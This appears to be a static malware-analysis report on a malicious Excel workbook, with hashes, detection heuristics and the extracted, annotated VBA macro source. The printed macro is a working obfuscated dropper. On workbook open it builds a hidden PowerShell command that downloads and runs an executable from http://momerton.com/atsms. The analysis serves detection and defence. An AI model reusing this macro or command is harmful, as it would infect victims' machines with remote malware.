Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 080f0bfedd2aff14…

MALICIOUS

Office (OLE)

54.0 KB Created: 2017-10-19 07:59:05 Authoring application: Microsoft Excel First seen: 2019-04-18
MD5: fe3732a27182aedb0b08e849687ce49f SHA-1: a37bb6d5b83fb810a82c2f305289375a77a18e45 SHA-256: 080f0bfedd2aff146ce14f8d9b781638b1253fda5cff44670ebbc65f6bc0e5e1
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA macros, and the presence of a Workbook_Open procedure means the macro runs as soon as the workbook is opened with macros enabled. The command string is assembled from string fragments (padding arrays of Minute()/Second() values with one fixed string element each, plus PowerShell `-f` format-string reordering) and decodes to `cmd /c"powershell -noprofile -windowstyle hidden -nologo -noninteractive -executionpolicy bypass "…"`. The PowerShell body resolves to: `[Type]("Environment")`; `do { sleep 33; $Des = [Environment]::GetFolderPath("Desktop"); (New-Object System.Net.WebClient).DownloadFile("http://momerton.com/atsms", "$Des\<random integer>.exe") } while (!$?)`; then `Start-Process $Des\<random integer>.exe`. It therefore downloads a second-stage executable from `http://momerton.com/atsms` to the user's Desktop under a random numeric name, retrying every 33 seconds until the download succeeds, and runs it — dropper behavior consistent with the ClamAV name Xls.Dropper.Generic. The URL and the `Desktop\<digits>.exe` drop path are the actionable indicators.

Heuristics 4

  • ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2926 bytes
SHA-256: 23ffbd056e9b2af3bce48ac499e28177b3e9cfa15b7b70d892e84672688e2416
Preview script
First 1,000 lines of the extracted script
' Module header of the "ThisWorkbook" document module (the auto-executing
' Workbook_Open lives here). VB_Base is the class GUID the module is bound to
' (presumably the Excel Workbook coclass; verify against the type library).
' Analyst annotations in this listing are apostrophe comments only; every
' original code line is unchanged.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True







' Returns the tail of the PowerShell one-liner:
'   while(!${?});&(\"{0}{2}{3}{1}\"-f 'St','ocess','art','-Pr') $Des\
' `while(!${?});` closes the `do{` opened by stupiida() (loop body ends with
' the "}" appended in Workbook_Open), so the download is retried until the
' previous command succeeds. The format string reorders its arguments
' ({0}{2}{3}{1}) into "Start-Process". The caller appends "<random>.exe",
' giving Start-Process $Des\<random>.exe. The `\"` sequences are passed
' through to the command line (presumably as escaped quotes for
' powershell.exe argument parsing).
Function patalofiid()

' Last three -f arguments ('ocess','art','-Pr') plus the ") $D" suffix.
sifuyoda = "ss','a" + "rt','-Pr'" + ") $D"
tabacooppiim = "whi"
patalofiid = tabacooppiim + "le(!" + "${?});" + "&(\""{0" + "}{2" + "}{3}{1}\""-f 'St'" + ",'o" + "ce" + sifuyoda + "es\"
End Function



' Returns the opening of the retry loop:
'   do{&(\"{1}{0}\" -f'ep','sle') 33;${D`es} =  $7d
' The format call reorders 'ep','sle' into "sleep" (presumably the
' Start-Sleep alias), so the loop pauses 33 seconds each iteration. The
' assignment is left unfinished on purpose: Workbook_Open concatenates
' "0mk6::gEtfoLdeRpATh(\"Desktop\")" after it, completing
' ${Des} = $7d0mk6::GetFolderPath("Desktop"). The backtick inside the
' braced variable name is presumably a no-op escape (name stays "Des").
Function stupiida()
nizergoob = "{D`es} =  $7d"
stupiida = "do{" + "&(" + "\""{1" + "}{0}\"" -f'e" + "p'," + "'sl" + "e') 3" + "3;$" + nizergoob
End Function

' Returns the command prefix that launches PowerShell. The arrays are padding
' (Minute(Now)/Second(Now)/Now() values) with a single fixed string element
' each; only those fixed elements are read. Concatenated, the result is:
'   cmd   /c"pOwErShELl -noPRoFi -WIn  HiDden -noLo -nONinTerA  -ExEcuTIOnP byPass    "
' i.e. cmd /c "powershell -noprofile -windowstyle hidden -nologo
' -noninteractive -executionpolicy bypass "..." (PowerShell parameter
' prefixes; the closing quote of the inner string is supplied by patalofiid()
' via Workbook_Open). The guard compares an Office enum constant
' (msoBlogMultipleCategories) with 0 — an opaque predicate, presumably always
' true; verify the constant's value. If it were false the function would
' return an empty string (no Else branch).
Function portoshipper()
If msoBlogMultipleCategories > 0 Then
listercorvin = Array(Minute(Now), Second(Now), "oP" + "RoFi -W", Now(), Second(Now))
izusesphone = Array(Minute(Now), Second(Now), "Er", Minute(Now))



sekemakol = Array(Second(Now), Minute(Now), "nONinT", Now())
opergrouper = "a"
nalmaclever = Array(Second(Now), Minute(Now), "Ecu" + "TI", Minute(Now), Minute(Now))

adeliacoler = Array(Second(Now), "d" + "en -n", Minute(Now))
' zyziopera(1) = `ass    "` (opens the inner quoted string), zyziopera(4) = `d   /c"`.
zyziopera = Array(Second(Now), opergrouper + "ss    """, Second(Now), Minute(Now), "d  " + " /c""", Minute(Now))
portoshipper = "c" + "m" + zyziopera(4) + "p" + "Ow" + izusesphone(2) + "ShE" + "Ll -n" + listercorvin(2) + "In  HiD" + adeliacoler(1) + "oLo -" + sekemakol(2) + "erA  -Ex" + nalmaclever(2) + "OnP byP" + zyziopera(1)
End If
End Function

' Returns the first PowerShell statement:
'   $7d0mK6 = [TyPE](\"{1}{0}{3}{2}\" -f 'on','eNvIr','Nt','mE') ;
' The format string reorders the arguments into "eNvIronmEnt", so
' $7d0mK6 = [Type]("Environment"); the variable is later used for
' ::GetFolderPath("Desktop") in Workbook_Open.
Function hintermulls()
kodakpictured = "vIr'" + ",'N" + "t','mE') ;  "
hintermulls = "$7d" + "0mK6 = [Ty" + "PE" + "](\""{1}{0" + "}{3}{2}\"" -f 'on'," + "'eN" + kodakpictured
End Function
' Auto-executes when the workbook is opened (with macros enabled). Assembles
' portoshipper + hintermulls + berlinootto + nishspace + quttrowheels and
' passes the result to Shell(). Decoded, the command is:
'   cmd /c"powershell -noprofile -windowstyle hidden -nologo -noninteractive
'     -executionpolicy bypass "$7d0mK6=[Type]("Environment");
'     do{ sleep 33; ${Des}=$7d0mk6::GetFolderPath("Desktop");
'         (New-Object System.Net.WebClient).DownloadFile.Invoke(
'             "http://momerton.com/atsms", "$Des\<N>.exe") }
'     while(!${?}); Start-Process $Des\<N>.exe"
' where <N> is the random integer generated below. Network IOC:
' http://momerton.com/atsms. Drop path: <Desktop>\<digits>.exe.
' The guard compares the Office enum constant msoAlertCancelThird with 0.09 —
' an opaque predicate, presumably always true; verify the constant's value.
Sub Workbook_Open()
pomologos = "p"
If msoAlertCancelThird > 0.09 Then
Dim agorofodo As String

' Random file name for the dropped executable: Int(Rnd * 9882761) coerced to
' a String, so <N> is a decimal integer in [0, 9882760].
Randomize
agorofodo = Int(Rnd * 9882761#)
fimmenos = agorofodo
' Completes the ${Des} assignment started in stupiida():
'   ${Des} = $7d0mk6::GetFolderPath("Desktop");(New-Object
berlinootto = stupiida + "0mk" + "6:" + ":g" + "Et" + "foL" + "deRp" + "ATh(\""De" + "sktop" + "\"");(&(\""{" + "0}{1" + "}{2}\"" -f'N" + "e','w-'" + ",'Ob" + "je" + "ct') "

' bissmarus() + these arguments format to "System.Net.WebClient"; then
' .DownloadFile.Invoke("http://momerton.com/atsms", "$Des\<N>.exe") and the
' "}" that closes the do{ } loop body.
nishspace = bissmarus + ".Ne','ent','t.Web','ClI')).dOwNLOaDfiLE.INVokE(\""ht" + "t" + "p://mo" + "merton.c" + "om/a" + "tsms\"",\""$D" + "es\" + fimmenos + ".e" + "xe\"")}"
' while(!${?}); Start-Process $Des\<N>.exe" — closes the inner quoted string.
quttrowheels = patalofiid + fimmenos + ".ex" + "e"""
xedosmaza = hintermulls + berlinootto + nishspace + quttrowheels
hubabbuba = portoshipper + xedosmaza
' Window style derived from an Office enum constant; presumably
' msoAnimationLookDown = 104, giving 0 (vbHide) — verify.
zalkaoreos = msoAnimationLookDown - 104
Shell hubabbuba, zalkaoreos
End If
End Sub

' Returns a partial format expression:
'   (\"{0}{2}{1}{3}{5}{6}{4}\"-f'Sy','te','s','m
' Workbook_Open appends ".Ne','ent','t.Web','ClI'))", so the seven arguments
' are 'Sy','te','s','m.Ne','ent','t.Web','ClI' and the index order
' {0}{2}{1}{3}{5}{6}{4} yields "System.Net.WebClient".
Function bissmarus()
bissmarus = "(\""{0}" + "{2}{1}{3}{" + "5}{6}" + "{4}\""-f'" + "Sy'" + ",'te','s','m"
End Function









' Module header of the "Sheet1" worksheet module. No procedures follow in the
' extracted source, so this module carries no code of its own. VB_Base is the
' class GUID the module is bound to (presumably the Excel Worksheet coclass;
' verify against the type library).
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True